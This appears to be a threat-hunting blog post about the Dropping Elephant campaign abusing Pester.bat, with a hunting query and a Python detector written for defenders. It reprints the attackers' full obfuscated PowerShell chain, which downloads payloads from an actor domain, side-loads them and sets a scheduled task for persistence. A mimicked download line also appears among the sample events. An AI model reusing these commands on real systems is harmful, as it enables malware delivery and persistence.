207. Dropping Elephant Misuses Pester to Execute Malicious PowerShell Commands

Hello everyone!

Let's look at how adversaries leverage the following technique: System Script Proxy Execution (T1216). But we need an example, of course. And we have it! The Dropping Elephant campaign against Turkish defense contractors described by Arctic Wolf.

Once again the threat actors used malicious LNK files. This time they abused Pester.bat to execute malicious PowerShell commands:

"C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav[.]org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";wg''et $a//expouav[.]org/download/fetch/list7/40275/view/e49c7ae0-f3d1-4073-83bb-b4ecba929fec -Outfile $c\Tasks\lama;r''e''n -Path "$c\Tasks\lama" -NewName "$c\Tasks\vlc.pepxpe";r''e''n -Path "$c\Tasks\vlc.pepxpe" -NewName ((Split-Path "$c\Tasks\vlc.pepxpe" -Leaf) -replace "p", "");wg''et $a//expouav[.]org/download/fetch/list5/19577/view/b5aaa6f0-6259-4ccb-b31a-d21e40c2eeff -Outfile $c\Tasks\lake;r''e''n -Path "$c\Tasks\lake" -NewName "$c\Tasks\libvlc.pdplpl";r''e''n -Path "$c\Tasks\libvlc.pdplpl" -NewName ((Split-Path "$c\Tasks\libvlc.pdplpl" -Leaf) -replace "p", "");wg''et $a//expouav[.]org/download/fetch/list6/41568/view/701bbff4-8fcb-4e9c-8577-00aed06d8443 -Outfile $c\Tasks\dalai;r''e''n -Path "$c\Tasks\dalai" -NewName "$c\Tasks\Winver.pepxpe";r''e''n -Path "$c\Tasks\Winver.pepxpe" -NewName ((Split-Path "$c\Tasks\Winver.pepxpe" -Leaf) -replace "p", "");c''p''i "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf" -destination .;wg''et $a//expouav[.]org/download/fetch/list8/20041/view/c6795195-6e84-4720-9420-e03da09b2187 -OutFile $c\Tasks\vlc.log;$d="$c\Tasks\Winver";s''ap''s $d -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "$c\Tasks\vlc", '/f';e''r''a''s''e *d?.?n?

Pester.bat is not an inherently malicious tool. It ships with Pester, the legitimate open-source PowerShell testing framework used for running unit tests against PowerShell scripts.

Since it is rarely used in most environments, we can build a simple hunting query:

event_type: "processcreatewin"
AND proc_file_path: "cmd.exe"
AND cmdline: "pester.bat"
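The same three-clause logic, applied to a handful of constructed process-creation events, as an added example (not from the original post or from Arctic Wolf's report). Field names (event_type, proc_file_path, cmdline) follow the query above; the events themselves are made up, and the normalization step collapses the quote-splitting trick visible in the campaign's command line (wg''et, s''ap''s) so that triage keywords match the real alias names:

```python
"""
Hunting for Pester.bat proxy execution in process-creation events.

Added example: reimplements the post's hunting query in Python and adds a
small triage pass to rank hits. Events below are constructed, not real logs.
"""
import re

# Constructed sample events. Event 0 mimics the shape of the campaign's command
# line (Pester.bat chained into PowerShell with '' quote-splitting); event 1 is
# meant as an ordinary developer invocation; events 2 and 3 are out of scope.
SAMPLE_EVENTS = [
    {
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\cmd.exe",
        "cmdline": r'''"C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;wg''et https://example.invalid/fetch -OutFile C:\Users\Public\lure.pdf;s''ap''s C:\Users\Public\lure.pdf''',
    },
    {
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\cmd.exe",
        "cmdline": r'''"C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" C:\dev\project\Tests''',
    },
    {   # Pester invoked directly from PowerShell: outside the query's cmd.exe scope
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -Command Invoke-Pester C:\dev\project\Tests",
    },
    {
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"cmd.exe /c dir C:\Users\Public",
    },
]

# PowerShell aliases/cmdlets that fetch content from the web (assumed list).
DOWNLOAD_CMDLETS = ("wget", "iwr", "curl", "invoke-webrequest")


def normalize_cmdline(cmdline: str) -> str:
    """Collapse the empty-string concatenation trick inside a bare word
    (wg''et -> wget, s''ap''s -> saps) and lowercase the result."""
    return re.sub(r"(?<=\w)''(?=\w)", "", cmdline).lower()


def matches_hunt(event: dict) -> bool:
    """The post's query: Windows process creation, cmd.exe image,
    and pester.bat anywhere in the (normalized) command line."""
    if event.get("event_type") != "processcreatewin":
        return False
    image = event.get("proc_file_path", "").replace("/", "\\").rsplit("\\", 1)[-1]
    if image.lower() != "cmd.exe":
        return False
    return "pester.bat" in normalize_cmdline(event.get("cmdline", ""))


def triage(event: dict) -> list:
    """Return indicator tags that make a Pester.bat hit worth a closer look.
    An empty list means the hit looks like plain test execution."""
    raw = event.get("cmdline", "")
    norm = normalize_cmdline(raw)
    reasons = []
    if re.search(r"\w''\w", raw):
        reasons.append("quote-split obfuscation")
    if re.search(r'pester\.bat"?\s*;\s*powershell', norm):
        reasons.append("pester.bat chained into powershell")
    if any(re.search(rf"\b{c}\b", norm) for c in DOWNLOAD_CMDLETS):
        reasons.append("web download cmdlet")
    if re.search(r"\b(saps|start-process)\b", norm):
        reasons.append("start-process")
    return reasons


def hunt(events: list) -> list:
    """Apply the query to every event; yield (index, triage tags) for hits."""
    return [(i, triage(e)) for i, e in enumerate(events) if matches_hunt(e)]


if __name__ == "__main__":
    for idx, tags in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: HIT", ", ".join(tags) or "(no extra indicators)")
```

Both cmd.exe launches of Pester.bat are returned, as the query intends; the triage tags are what separate the chained-PowerShell hit from the plain test run, so a hunter can review the noisy hits last. The powershell.exe event is deliberately excluded, since the query keys on cmd.exe as the image.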

See you tomorrow! 
